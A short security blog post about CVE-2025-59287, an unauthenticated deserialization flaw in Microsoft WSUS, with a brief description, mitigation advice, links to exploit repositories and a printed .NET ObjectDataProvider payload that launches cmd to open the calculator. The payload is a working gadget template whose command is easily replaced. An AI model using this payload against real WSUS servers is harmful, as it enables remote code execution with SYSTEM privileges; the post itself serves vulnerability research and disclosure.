Saturday, November 8, 2025

PoC code for Microsoft Windows Server Update Services (WSUS) attack CVE-2025-59287

CVE-2025-59287 is a critical RCE vulnerability in Microsoft Windows Server Update Services (WSUS), caused by unsafe deserialization of AuthorizationCookie data through BinaryFormatter in the EncryptionHelper.DecryptData() method. The vulnerability allows an unauthenticated attacker to achieve remote code execution with SYSTEM privileges by sending malicious encrypted cookies to the GetCookie() endpoint. Permanent mitigation requires replacing BinaryFormatter with secure serialization mechanisms, implementing strict type validation, and enforcing proper input sanitization on all cookie data.

PoC code below, excellent article

CVE-2025-59287 WSUS Unauthenticated RCE | HawkTrace

Poc Decode Payload running calc.exe

<Microsoft.PowerShell.Editor, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35 Microsoft.VisualStudio.Text.Formatting.TextFormattingRunProperties.ForegroundBrush=Black><?xml version="1.0" encoding="utf-16"?>
<ObjectDataProvider MethodName="Start" IsInitialLoadEnabled="False" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:sd="clr-namespace:System.Diagnostics;assembly=System" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml">
  <ObjectDataProvider.ObjectInstance>
    <sd:Process>
      <sd:Process.StartInfo>
        <sd:ProcessStartInfo Arguments="/c calc" StandardErrorEncoding="{x:Null}" StandardOutputEncoding="{x:Null}" UserName="" Password="{x:Null}" Domain="" LoadUserProfile="False" FileName="cmd" />
      </sd:Process.StartInfo>
    </sd:Process>
  </ObjectDataProvider.ObjectInstance>
</ObjectDataProvider>


Other sources

PayloadsAllTheThings/Insecure Deserialization/DotNET.md at master · swisskyrepo/PayloadsAllTheThings (github.com)

dexterm300/cve-2025-59287-exploit-poc: Exploitation proof-of-concept for CVE-2025-59287 - a critical vulnerability in the Windows Server Update Service (WSUS) caused by the deserialization of untrusted data. This flaw allows an unauthorized attacker to execute arbitrary code over a network, posing a significant security risk. (github.com)

ObjectDataProvider verwendet (www-cnblogs-com.translate.goog)

dotnet-deserialization/XmlSerializer.md at main · Y4er/dotnet-deserialization (github.com)

.NET Deserialization Exploitation Chain: A Beginner's Guide - XmlSerializer - FreeBuf Network Security Portal (www-freebuf-com.translate.goog)


Posted by metadataconsulting (profile) at 12:00 AM

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)